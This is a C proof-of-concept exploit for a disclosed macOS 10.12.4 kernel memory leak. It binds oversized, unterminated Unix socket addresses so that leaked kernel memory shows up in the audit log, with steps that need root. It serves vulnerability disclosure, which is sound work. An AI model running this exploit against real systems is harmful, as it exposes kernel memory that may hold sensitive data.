- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- #include <sys/un.h>
- #include <unistd.h>
- #include <sys/types.h>
- #include <sys/socket.h>
- /*
- macOS 10.12.4 0day kernel memory leak PoC (see: https://objective-see.com/blog/blog_0x1B.html)
- tl;dr Apple 'fixed' a bug by #1 not fixing it, #2 introducing a kernel memory leak ¯\_(ツ)_/¯
- #1 enable (network) auditing:
- a) add 'nt' to /etc/security/audit_control: flags:lo,aa,nt
- or
- b) read directly off /dev/auditpipe (after configuring it with AUDIT_CLASS_NETWORK)
- #2 run this program
- #3 dump the audit log, /var/audit/current, to view leaked kernel memory
- note: r00t is required for #1 && #3, so impact of this bug is limited
- */
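/*
 * Entry point: builds 100 over-long, unterminated AF_UNIX addresses and
 * hands each to bind(); per the header comment the audited bind attempts
 * are where the leaked kernel memory shows up.
 *
 * Fixes over the original: malloc() result checked, the unlink() call now
 * uses the address buffer (the original cast the socket() function pointer
 * instead), the socket descriptor and buffer are released every iteration.
 * Returns 0 on completion, 1 if malloc() fails.
 */
int main(int argc, char*argv[])
{
    (void)argc;
    (void)argv;

    //make a bunch of sockets
    for(int i=0; i<100; i++)
    {
        //random size [128 - 255] (fits in the unsigned char sun_len)
        int size = arc4random_uniform(128)+128;

        //alloc/set buffer
        //the buffer is deliberately larger than struct sockaddr_un and
        //sun_path is deliberately NOT NUL-terminated: that malformed
        //address is what gets passed to bind() below
        char* unixSocket = malloc(size);
        if(unixSocket == NULL)
        {
            perror("malloc");
            return 1;
        }
        memset(unixSocket, 0x41, size);

        //init
        struct sockaddr_un* addr = (struct sockaddr_un*)unixSocket;
        addr->sun_len = size;
        addr->sun_family = AF_UNIX;

        //unlink
        //sun_path is not NUL-terminated, so unlink() must be given a
        //terminated copy rather than the raw field (strlen would over-read)
        char path[sizeof addr->sun_path + 1];
        memcpy(path, addr->sun_path, sizeof addr->sun_path);
        path[sizeof addr->sun_path] = '\0';
        unlink(path);

        //bind
        int fd = socket(AF_UNIX, SOCK_STREAM, 0);
        if(fd < 0)
        {
            perror("socket");
            free(unixSocket);
            continue;
        }
        //bind()'s return value is not needed here: the original ignored it
        //too, and the header comment says only the audited attempt matters
        bind(fd, (struct sockaddr *)unixSocket, size);

        //cleanup (the original leaked both the descriptor and the buffer)
        close(fd);
        free(unixSocket);
    }

    return 0;
}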